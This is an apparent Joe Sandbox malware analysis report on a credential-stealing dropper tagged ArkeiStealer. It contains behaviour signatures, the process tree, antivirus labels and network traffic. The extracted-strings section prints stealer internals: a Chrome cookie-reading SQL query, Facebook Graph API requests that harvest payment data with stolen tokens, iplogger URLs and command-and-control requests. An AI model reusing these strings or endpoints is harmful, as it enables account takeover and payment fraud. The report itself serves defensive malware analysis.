Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report KeJ7Cl7flZ.exe

Overview

General Information

Sample Name:KeJ7Cl7flZ.exe
Analysis ID:324174
MD5:4e759849412063c6590936671ce4aa0e
SHA1:40d132516cc4b9aa00dca2b2f068c439cf8f59c3
SHA256:7a79f0c95e891b939e275fa19e641b676f2eb70471945fb3b15d6a649cafe071
Tags:ArkeiStealerexe

Most interesting Screenshot:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (creates a PE file in dynamic memory)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to detect sleep reduction / modifications
Contains functionality to infect the boot sector
Drops PE files to the document folder of the user
Machine Learning detection for dropped file
Machine Learning detection for sample
May check the online IP address of the machine
PE file has a writeable .text section
Registers a new ROOT certificate
Tries to harvest and steal browser information (history, passwords, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read device registry values (via SetupAPI)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
File is packed with WinRar
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries device information via Setup API
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Stores large binary data to the registry
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

Startup

  • System is w10x64
  • KeJ7Cl7flZ.exe (PID: 4576 cmdline: 'C:\Users\user\Desktop\KeJ7Cl7flZ.exe' MD5: 4E759849412063C6590936671CE4AA0E)
    • 002.exe (PID: 3568 cmdline: 'C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe' MD5: 6503C9C4F19A4B33B701CC5B97B349BC)
      • WerFault.exe (PID: 204 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 724 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
      • WerFault.exe (PID: 204 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 740 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • Setup.exe (PID: 6668 cmdline: 'C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe' MD5: 62EAEA103DD9BEB69E884F2EDE1ACD63)
      • setup.exe (PID: 6732 cmdline: 'C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe' -s MD5: D64E3CC11AFC6331715BDFEC5F26C2A0)
        • aliens.exe (PID: 1112 cmdline: 'C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe' MD5: 0F88FD9D557FFBE67A8897FB0FC08EE7)
    • jg2_2qua.exe (PID: 5292 cmdline: 'C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe' MD5: 676757904C8383FD9ACBEED15AA8DCC4)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000013.00000002.511085870.0000000003310000.00000040.00000001.sdmpPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n

Unpacked PEs

SourceRuleDescriptionAuthorStrings
19.2.aliens.exe.3310000.5.unpackPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
19.2.aliens.exe.10000000.6.unpackPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
19.2.aliens.exe.3310000.5.raw.unpackPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeAvira: detection malicious, Label: HEUR/AGEN.1139239
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeAvira: detection malicious, Label: TR/Siggen.lhhpy
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exeAvira: detection malicious, Label: TR/Crypt.CFI.Gen
Source: C:\Users\user\Documents\VlcpVideoV1.0.1\jg2_2qua.exeAvira: detection malicious, Label: TR/Crypt.CFI.Gen
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\hjjgaa.exeAvira: detection malicious, Label: HEUR/AGEN.1134829
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeAvira: detection malicious, Label: TR/AD.PredatorThief.gldkk
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\file1.exeAvira: detection malicious, Label: TR/AD.JamkeeDldr.gwmgy
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ubisoftpro.exeAvira: detection malicious, Label: TR/AD.ColtyStealer.mwfxd
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\askinstall21.exeAvira: detection malicious, Label: HEUR/AGEN.1138531
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\BTRSetp.exeAvira: detection malicious, Label: TR/Kryptik.ijozo
Multi AV Scanner detection for domain / URLShow sources
Source: jojo-soft.xyzVirustotal: Detection: 8%Perma Link
Source: evograph.roVirustotal: Detection: 7%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: KeJ7Cl7flZ.exeVirustotal: Detection: 67%Perma Link
Source: KeJ7Cl7flZ.exeReversingLabs: Detection: 79%
Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\85F91A36E275562F.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exeJoe Sandbox ML: detected
Source: C:\Users\user\Documents\VlcpVideoV1.0.1\jg2_2qua.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\hjjgaa.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\file1.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ubisoftpro.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\askinstall21.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\SSSS.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeJoe Sandbox ML: detected
Machine Learning detection for sampleShow sources
Source: KeJ7Cl7flZ.exeJoe Sandbox ML: detected
Source: 19.2.aliens.exe.2f00000.4.unpackAvira: Label: TR/Patched.Ren.Gen
Source: 26.0.jg2_2qua.exe.400000.0.unpackAvira: Label: TR/Crypt.CFI.Gen
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_10003535 CryptUnprotectData,_malloc,_memset,_memmove,__snprintf_s,_free,LocalFree,1_2_10003535
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,19_2_1001F720
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00EC29A3 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00EC29A3
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00ED0BA0 SendDlgItemMessageW,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00ED0BA0
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00EDFB78 FindFirstFileExA,0_2_00EDFB78
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00ED2E67 VirtualQuery,GetSystemInfo,FindFirstFileExA,0_2_00ED2E67
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_012746B9 __EH_prolog3_GS,GetFullPathNameA,__cftof,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,_strlen,1_2_012746B9
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_10009DF3 _memset,GetEnvironmentVariableW,_wprintf,FindFirstFileW,__snprintf_s,FindNextFileW,FindClose,1_2_10009DF3
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,15_2_00406CC7
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_00406301 FindFirstFileW,FindClose,15_2_00406301
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_6FEE0F62 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,15_2_6FEE0F62
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_6FED1C23 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,15_2_6FED1C23
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0005A534 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,17_2_0005A534
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0006B820 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,17_2_0006B820
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0007A928 FindFirstFileExA,17_2_0007A928
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,19_2_00452126
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,19_2_0045C999
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,19_2_00436ADE
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,19_2_00434BEE
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_0045DD7C FindFirstFileW,FindClose,19_2_0045DD7C
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,19_2_0044BD29
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,19_2_00436D2D
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,19_2_00442E1F
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,19_2_00475FE5
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_0044BF8D
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_1001A170 FindFirstFileA,FindClose,19_2_1001A170
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeFile opened: C:\Users\userJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior

Networking:

barindex
May check the online IP address of the machineShow sources
Source: unknownDNS query: name: iplogger.org
Source: unknownDNS query: name: iplogger.org
Source: unknownDNS query: name: ip-api.com
Source: Joe Sandbox ViewIP Address: 88.99.66.31 88.99.66.31
Source: Joe Sandbox ViewIP Address: 88.99.66.31 88.99.66.31
Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global trafficHTTP traffic detected: GET /seemorebty/il.php?e=jg2_2qua HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Accept-Language: en-US,en;q=0.9Referer: https://www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36Host: 101.36.107.74
Source: unknownTCP traffic detected without corresponding DNS query: 101.36.107.74
Source: unknownTCP traffic detected without corresponding DNS query: 101.36.107.74
Source: unknownTCP traffic detected without corresponding DNS query: 101.36.107.74
Source: unknownTCP traffic detected without corresponding DNS query: 101.36.107.74
Source: unknownTCP traffic detected without corresponding DNS query: 101.36.107.74
Source: unknownTCP traffic detected without corresponding DNS query: 101.36.107.74
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_1000AA5D _memset,_memset,_memset,_memset,_memset,InternetCrackUrlA,__time64,_rand,InternetOpenA,_wprintf,InternetConnectA,_wprintf,InternetCloseHandle,HttpOpenRequestA,_wprintf,InternetCloseHandle,InternetCloseHandle,HttpAddRequestHeadersA,InternetSetOptionA,LdrInitializeThunk,LdrInitializeThunk,HttpSendRequestA,GetLastError,HttpQueryInfoA,_wprintf,_wprintf,InternetReadFile,_memset,GetLastError,_wprintf,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,LdrInitializeThunk,LdrInitializeThunk,1_2_1000AA5D
Source: global trafficHTTP traffic detected: GET /seemorebty/il.php?e=jg2_2qua HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Accept-Language: en-US,en;q=0.9Referer: https://www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36Host: 101.36.107.74
Source: askinstall21.exeString found in binary or memory: %02X%02X%02X%02X%02X%02Xcmd.exe /c taskkill /f /im chrome.exeDefault\js\background.js5.18.6_0\fnfhfpkmpnmlmlgfeabpegnfpdnmokcoconst mac = '';const channelid ='const version='SOFTWARE\Policies\Google\Chrome\ExtensionInstallWhitelist99extensions.settings.\u003C<extensionssettingsprotectionmacssuper_mac107\Temp\vnnsfgfgfghaz99\" /s /e /y" "xcopy " --window-position=-50000,-50000 --user-data-dir=" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/","message":"","code":"{"type":"installresult","uid":"successerr : write reg failed(RegCreateKeyExA)err : write reg failed(RegSetValueExA)err : extension dir not found(possible no chrome installed)err : zip release failederr : securepref not founderr : parse json failederr : unknown1","channelid":"","adminmode":""}","version":"JSON=application/x-www-form-urlencoded;charset=utf-8http://www.fddnice.pw//Home/Index/lkdinlhttp://12https://iplogger.org/1uVkt796https://iplogger.org/1TW3i797https://iplogger.org/1q6Jt7105https://iplogger.org/1O2BH106https://iplogger.org/1OZVHhttps://iplogger.org/1OXFG108https://iplogger.org/1lC5g109https://iplogger.org/1Ka7t7110https://iplogger.org/1OhAG111https://iplogger.org/16ajh7112https://iplogger.org/1XSq97113https://iplogger.org/19iM77114https://iplogger.org/16xjh7115https://iplogger.org/1XJq97116https://iplogger.org/1XKq97117https://iplogger.org/1X8M97118https://iplogger.org/1UpU57119https://iplogger.org/1T79i7120https://iplogger.org/1T89i7121https://iplogger.org/1Uts87122https://iplogger.org/1KyTy7123https://iplogger.org/1yXwr7124https://iplogger.org/1bV787125https://iplogger.org/1b4887\/ equals www.facebook.com (Facebook)
Source: askinstall21.exeString found in binary or memory: https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/ equals www.facebook.com (Facebook)
Source: jg2_2qua.exe, 0000001A.00000002.503990767.0000000000401000.00000040.00020000.sdmpString found in binary or memory: &ctarget=https%3A%2F%2Fwww.facebook.comcquick=jsc_c_e&cquick_token=/settings?find email</strong><strong>fbSettingsListItemContentEmail not found.0" title="href="https://www.facebook.com/profile_icondata-gt" role="<a aria-label=<a class=*/profile.php?sk=friend_gs6">,"Friends":"</span><span>,"status":","Page":"1<a href="https://business.facebook.com,"bm":"<>class="lastRow right","currency":","a":","b":"CHROME,"Channel":","Browser":"}]0102030405060708"username":"edge_followed_by":{"count":edge_follow":{"count":email":"username":"phone_number":"gender":first_name":"last_name":"{#},"br":"","yo":""pa":""us":""re":""ph":""se":""fs":,"fsr":"Channel":""xtype":2}]Failed to initialise Winsock, Error:%u equals www.facebook.com (Facebook)
Source: 002.exeString found in binary or memory: ....https://www.facebook.com/pages/?category=your_pages&ref=bookmarksuri_token"has_main_page":"https://business.facebook.com/select/?next=https%3A%2F%2Fbusiness.facebook.com%2F"has_BM":"https://www.facebook.com/ads/manager/account_settings/information/?act=%s&pid=p1&page=account_settings&tab=account_information"AdsCMConnectConfig",\[\],.?access_token:"(.+?)""AdsInterfacesSessionConfig",\[\],.?"sessionID":"(.+?)"https://graph.facebook.com/v7.0/act_%s?access_token=%s&_reqName=adaccount&_reqSrc=AdsPaymentMethodsDataLoader&_sessionID=%s&fields=%%5B%%22all_payment_methods%%7Bpayment_method_altpays%%7Baccount_id%%2Ccountry%%2Ccredential_id%%2Cdisplay_name%%2Cimage_url%%2Cinstrument_type%%2Cnetwork_id%%2Cpayment_provider%%2Ctitle%%7D%%2Cpm_credit_card%%7Baccount_id%%2Ccredential_id%%2Ccredit_card_address%%2Ccredit_card_type%%2Cdisplay_string%%2Cexp_month%%2Cexp_year%%2Cfirst_name%%2Cis_verified%%2Clast_name%%2Cmiddle_name%%2Ctime_created%%2Cneed_3ds_authorization%%2Csupports_recurring_in_india%%2Cverify_card_behavior%%7D%%2Cpayment_method_direct_debits%%7Baccount_id%%2Caddress%%2Ccan_verify%%2Ccredential_id%%2Cdisplay_string%%2Cfirst_name%%2Cis_awaiting%%2Cis_pending%%2Clast_name%%2Cmiddle_name%%2Cstatus%%2Ctime_created%%7D%%2Cpayment_method_extended_credits%%7Baccount_id%%2Cbalance%%2Ccredential_id%%2Cmax_balance%%2Ctype%%2Cpartitioned_from%%2Csequential_liability_amount%%7D%%2Cpayment_method_paypal%%7Baccount_id%%2Ccredential_id%%2Cemail_address%%2Ctime_created%%7D%%2Cpayment_method_stored_balances%%7Baccount_id%%2Cbalance%%2Ccredential_id%%2Ctotal_fundings%%7D%%2Cpayment_method_tokens%%7Baccount_id%%2Ccredential_id%%2Ccurrent_balance%%2Coriginal_balance%%2Ctime_created%%2Ctime_expire%%2Ctype%%7D%%7D%%22%%5D&include_headers=false&locale=en_US&method=get&pretty=0&suppress_http_code=1&xref=f33f78145820f4 }"pay":instagramds_user_id\\"\\"", "path":"/", "secure": false,"value": "{"domain":"www.instagram.com", "expirationDate":1590337688, "hostOnly": false, "httpOnly": true, "name": "instagram cookie:%s equals www.facebook.com (Facebook)
Source: 002.exeString found in binary or memory: Cookie: c_user={https://www.facebook.com/ads/manager/accounts/https://www.facebook.com/settings?tab=notificationsnoyes","isValid":"0https://www.facebook.com/profile.php"displayable_count":{"FantailLogQueue":null},"friends":"mail":"https://www.facebook.com/accountquality/%s/?source=mega_menu&nav_source=flyout_menu&nav_id=1765193856"adAccountID":""ad":"https://www.facebook.com/bookmarks/pages?ref_type=logout_gearid:"\d+",name:"(.+?)",count: equals www.facebook.com (Facebook)
Source: jg2_2qua.exe, 0000001A.00000003.480992334.000000000071B000.00000004.00000001.sdmpString found in binary or memory: Referer: https://www.facebook.com equals www.facebook.com (Facebook)
Source: ubisoftpro.exeString found in binary or memory: T.exe_,"Friends":","status":","currency":","bm":","type":","a":","b":"p,"Channel":","Browser":"rltext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*;q=0.8,application/signed-exchange;v=b3username":"},edge_followed_by":{"count":edge_follow":{"count":email":"phone_number":"gender":first_name":","last_name":"{#}\"co":""br":""sy":""yo":""pa":""re":""ph":""se":""fs":"fsr":inauth_tokentwhttps://www.airbnb.cn/account-settingstext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3.airbnb.cnacha"compat_iframe_token":"https://www.facebook.com/settings?cquick=jsc_c_c&cquick_token=&ctarget=https%3A%2F%2Fwww.facebook.comhttps://www.facebook.com/settings&#064;</strong><strong>@b88801?act=</span><span>https://www.facebook.com/ads/manager/account_settings/account_billing/?act=&pid=p1&page=account_settings&tab=account_billing_settingsaccess_token:"adsApiVersion:"sessionID:"locale:"https://graph.facebook.com//act_?access_token=&_reqName=adaccount&_reqSrc=AdsPaymentMethodsDataLoader&_sessionID=&fields=%5B%22all_payment_methods%7Bpayment_method_altpays%7Baccount_id%2Ccountry%2Ccredential_id%2Cdisplay_name%2Cimage_url%2Cinstrument_type%2Cnetwork_id%2Cpayment_provider%2Ctitle%7D%2Cpm_credit_card%7Baccount_id%2Ccredential_id%2Ccredit_card_address%2Ccredit_card_type%2Cdisplay_string%2Cexp_month%2Cexp_year%2Cfirst_name%2Cis_verified%2Clast_name%2Cmiddle_name%2Ctime_created%2Cneed_3ds_authorization%2Callow_manual_3ds_authorization%2Csupports_recurring_in_india%7D%2Cpayment_method_direct_debits%7Baccount_id%2Caddress%2Ccan_verify%2Ccredential_id%2Cdisplay_string%2Cfirst_name%2Cis_awaiting%2Cis_pending%2Clast_name%2Cmiddle_name%2Cstatus%2Ctime_created%7D%2Cpayment_method_extended_credits%7Baccount_id%2Cbalance%2Ccredential_id%2Cmax_balance%2Ctype%2Cpartitioned_from%2Csequential_liability_amount%7D%2Cpayment_method_paypal%7Baccount_id%2Ccredential_id%2Cemail_address%2Ctime_created%7D%2Cpayment_method_stored_balances%7Baccount_id%2Cbalance%2Ccredential_id%2Ctotal_fundings%7D%2Cpayment_method_tokens%7Baccount_id%2Ccredential_id%2Ccurrent_balance%2Coriginal_balance%2Ctime_created%2Ctime_expire%2Ctype%7D%7D%22%5D&include_headers=false&locale=&method=get&pretty=0&suppress_http_code=1pm_credit_card"country":mastervisaamericanpaypalbalance</td>||-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36ike.airbnb.cn11fiachitichiffiedtch9C71F883-5E43-41AA-85D0-5272784FB258,"Creditcard":"timeline_chrome.php?sk=friendshttp://103.91.21Facebook</title>facebook</title>book.com/pages/?category=your_paall_accounts_tabhttp://qazwsxedcnavigate_from_adSoftware\\TestRele_account_id_cehttps://www.facebook.com/profilebook.com/settinggister\\TestRegiges&ref=bookmarkbook.com/ads/managram.com/accouncompat_iframe_toks/pages?ref_typbook.com/bookmarhttps://www.instadmined_pages":{ equals www.facebook.com (Facebook)
Source: ubisoftpro.exeString found in binary or memory: \MicrosoftEdgeCP\\Application\\c\\Google\\Chrome\\User Data\\Def\\Mozilla\\Firefwww.facebook.comwww.instagram.co\\Mozilla Firefo equals www.facebook.com (Facebook)
Source: jg2_2qua.exe, 0000001A.00000003.481728424.000000000075E000.00000004.00000001.sdmpString found in binary or memory: ct name,value,encrypted_value from cookies where instr("www.facebook.com", host_key)>0 equals www.facebook.com (Facebook)
Source: hjjgaa.exeString found in binary or memory: d@invalid stoi argumentstoi argument out of rangeUseJu47egg whatppphatOjk4ehg riwjgHgegUse whatppphatYk43h7gr riwjg^(([^:\/?#]+):)?(//([^\/?#:]*)(:([^\/?#]*))?)?([^?#]*)(\?([^#]*))?(#(.*))?MalformedHh6e4sgg urlStrXhegkh4gErrorJhg4eu (WinHttpOpenNm4eg)ErrorOj7g4he (WinHttpGetProxyForUrlTh7e4gh)Error (WinHttpGetProxyForUrl)httphttpsUnknownNsV6e4hg schemeBe7n4us ErrorBjhe4hg (WinHttpConnectLj6e3hgg)?ErrorS7je4hg (WinHttpOpenRequestP6je4hg)ErrorHf74ge7g (WinHttpSendRequestVe7j4gi)ErrorJh7b4egg (WinHttpSendRequestPke4jhg)ErrorKj7e4hg (WinHttpReceiveResponseCeheg34g)ErrorTjr57eh (WinHttpQueryDataAvailableAe7hj4g)ErrorUj7e4hg (WinHttpReadDataPjke4hg)ErrorGh7e4hg (WinHttpSetCredentialsHe7j4hg)ErrorPj7e4hg (WinHttpQueryHeadersYg8e5gg)ErrorJh7eg4g (WinHttpQueryAuthSchemesYe6hg4)POSTGETlogin/device-based/loginContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9viewport-width: 1920Sec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Referer: https://www.facebook.com/Origin: https://www.facebook.comSec-Fetch-Dest: documentUpgrade-Insecure-Requests: 